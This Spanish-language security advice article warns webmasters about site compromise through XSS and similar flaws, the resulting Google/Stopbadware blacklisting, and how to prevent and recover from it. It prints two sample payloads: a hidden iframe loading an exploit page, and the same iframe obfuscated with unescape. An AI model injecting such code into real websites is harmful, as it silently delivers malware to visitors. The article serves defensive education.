Naranja #15


Consejo de Seguridad

Webmasters: Las otras víctimas del Fraude en línea

Generalmente cuando hablamos de víctimas de fraudes en línea, pensamos que solo estamos haciendo referencia a personas que realizan actividades que no están directamente relacionadas con el mundo de la tecnología; pero hay otro grupo de usuarios que suele verse afectado, pudiendo ser estos los más perjudicados: los webmasters, persona (o grupo de ellas) encargada de la creación y mantenimiento de un sitio web.

Cross Site Scripting (XSS), inyección de SQL, inclusión de archivos (RFI, LFI) entre otras, son metodologías que deberían hoy en día ser tenidas en cuenta por desarrolladores y webmasters. Si bien, a simple vista, nos pueden llegar a parecer técnicas simples y sin demasiado riesgo para nuestra web, un pequeño error en el filtrado de los contenidos permitiría ejecución de JavaScript, dejando así las huellas de cada usuario a la merced del atacante.

En el caso de un foro, que por un error en su programación, no filtra correctamente los parámetros en una etiqueta en particular, y esto permite ejecutar código del lado del cliente (navegador de cada usuario), además de dejar a nuestros usuarios vulnerables ante el robo de cookies, también podríamos estar propagando algún tipo de malware, basta de un pequeño código como el siguiente ejemplo para llegar a ser catalogados como sitio fraudulento:

<IFRAME SRC='http://sitio-vulnerado.com/code/xploit.php' WIDTH=10 HEIGHT=10
name='ad' style='display:none'></IFRAME>

Otro ejemplo un poco mas "rebuscado" es el uso de escape para ofuscar el código, e impedir de esa forma la interpretación del mismo, salvo por el propio navegador. Por ejemplo, este código pertenece al anterior "iframe" ofuscado, utilizando una función JavaScript (escape/unescape), que es correctamente interpretada por cualquier navegador actual (con JS activado).

<Script Language='JavaScript'>document.write(unescape('
%3c%49%46%52%41%4d%45%20%53%52%43%3d%27%68%74%74%70%3a%2f%2f%23
%23%23%23%23%23%2f%63%6f%64%65%2f%78%70%6c%6f%69%74%2e%70%68%70
%27%20%57%49%44%54%48%3d%31%30%20%48%45%49%47%48%54%3d%31%30%20
%6e%61%6d%65%3d%27%61%64%27%20%73%74%79%6c%65%3d%27%64%69%73%70
%6c%61%79%3a%6e%6f%6e%65%27%3e%3c%2f%49%46%52%41%4d%45%3e
'));</script>

Ser catalogados como sitios fraudulentos, hace referencia a un caso muy común por estos días y que a más de un webmaster le ha puesto los pelos de punta. Bien conocida por todos es la cuota abarcada por Google dentro de los buscadores, y una caída en su ranking podría ser lamentable para un sitio, y por consiguiente una baja en los ingresos. Desde hace ya un tiempo, este buscador ha decidido comenzar a identificar toda aquella web que pueda instalar programas dañinos o engañosos en los equipos de los usuarios, colaborando así con la iniciativa conjunta de Stopbadware.org en la que también colaboran otras empresas importantes.

Sitio dañino

Aquí hace referencia a una web víctima de una intrusión, en la cual se incluyó dentro de su portada una porción de código como las anteriormente mencionadas. Esto provocó que fuese colocado dentro de esta lista negra utilizada por Stopbadware.org y Google, mostrando un mensaje de advertencia al usuario debajo de los resultados de la búsqueda. Al hacer clic sobre el enlace, se informa al usuario que el sitio al que esta intentando entrar podría dañar su equipo. En este caso esta empresa se vio afectada por una tremenda caída en sus visitas y, por ende, en sus ingresos.

Sitio dañino

No solo podemos vernos afectados por un código insertado en alguna de nuestras paginas, sino por aplicaciones que podrían ser subidas dentro de nuestra web. En el caso de que nuestro sitio disponga de descargas para el público, las mismas podrían ser reemplazadas por algún malware, y nuevamente podríamos terminar dentro de la lista de Stopbadware.org.

Ahora lo que todo webmaster se debe estar preguntando es: ¿cómo salir de esta situación? Antes de esto, algunos consejos para ayudar a prevenir este tipo de inconvenientes.

  1. Cuando creamos una web no solo debemos controlar el origen de las aplicaciones a utilizar, sino también su integridad, y de ser posible, su contenido. A la hora de descargar algún script solemos tener a nuestra disposición el Hash MD5 o SHA1 para dichos archivos, con lo que podemos controlar que no hayan sido modificados en el trayecto.
  2. También es altamente recomendable implementar una buena política para realizar copias de seguridad, y comparar los mismos con los archivos en línea en busca de diferencias, como podría ser algún código agregado por un extraño. En caso de haber sido atacados, lo ideal es restaurar nuestra web desde una copia limpia y segura, eliminando así toda posibilidad de una nueva intrusion, ya que muchas veces estos individuos suelen dejar archivos y scripts ocultos dentro del contenido de nuestra web, para así asegurarse un futuro reingreso al sistema.
  3. Comprobar los enlaces salientes desde nuestro sitio, ya sean intercambios de enlaces realizados, webs recomendadas en noticias o por los mismos usuarios, anuncios publicitarios y todo aquello que este al alcance del visitante.
  4. En caso de notar algo raro en nuestro sitio o haber sido atacado, informar al administrador de nuestro servidor, o en su defecto contactar a quien corresponda dentro de la empresa que nos provee el alojamiento. Con eso podremos evitar futuras sanciones a causa de denuncias recibidas con respecto a los contenidos de nuestro portal, principalmente si las quejas son sobre correos no deseados que llegan incitando a la gente de que haga clic en nuestra URL.

Ahora sí, ¿qué hacer si uno ha sido etiquetado como sitio peligroso por Google? Según dice la ayuda del buscador se debe solicitar una nueva revisión de la web por parte de Stopbadware.org, pero antes deberemos revisar nuestra web en busca de contenidos que pudiesen ser considerados peligrosos para los usuarios, removerlos y en lo posible prevenir incidentes en el futuro. Prestar especial atención a todos aquellos contenidos generados por los usuarios, como lo son comentarios y mensajes en foros, artículos y demás.

Activar el modo paranoico ante la Ingeniería Social, no dar demasiados datos a desconocidos, elegir buenas contraseñas, en el caso de no poder recordarlas todas, guardar las mismas de forma segura, ya sea utilizando alguna aplicación para ello o nuestro ingenio (¡esto no incluye los Post-It pegados al monitor!).

Crear cuentas de acceso FTP y al sitio/blog/consola/etc. sólo con los permisos necesarios, controlar su accionar, y verificar todo aquello que sea accedido, escrito o modificado por dicha persona. Una vez realizado el trabajo eliminar la cuenta y sus permisos asociados.

Mantener todas las aplicaciones al día, si bien suelen darse casos en los que nos encontramos con que debemos estar subiendo parches casi diariamente, lo cual puede resultar cansador, eso no quiere decir que no deba hacerse.

Modo Paranoico

Controlar origen, integridad y contenidos de todo archivo que vaya ser destinado al sitio web. Dar acceso limitado a personas ajenas al proyecto y que sólo vayan a realizar tareas menores. Implementar una política de copias de seguridad de forma incremental o progresiva (consiste en copiar solamente los archivos que han cambiado desde la realización de otra copia).

Escoger buenas contraseñas, de ser posible no limitarse sólo a números y letras.

Actualizar siempre, estar al día sobre nuevas vulnerabilidades y parches pero sobre todo aplicarlos. Desconfiar antes, hacer clic después.

Más Información

Request for Review Information
Hacked websites, trojan horses, Russian/Panamanian blackhat hackers - just another day at the Berkman Center
Nueva frase: "Este sitio puede dañar tu equipo"
¿Por qué en algunos de los resultados de búsqueda se indica que "El sitio puede dañar tu equipo"? Multi-hack...defaced site hosting Phish


Gracias Martin Aberastegue
http://www.rzw.com.ar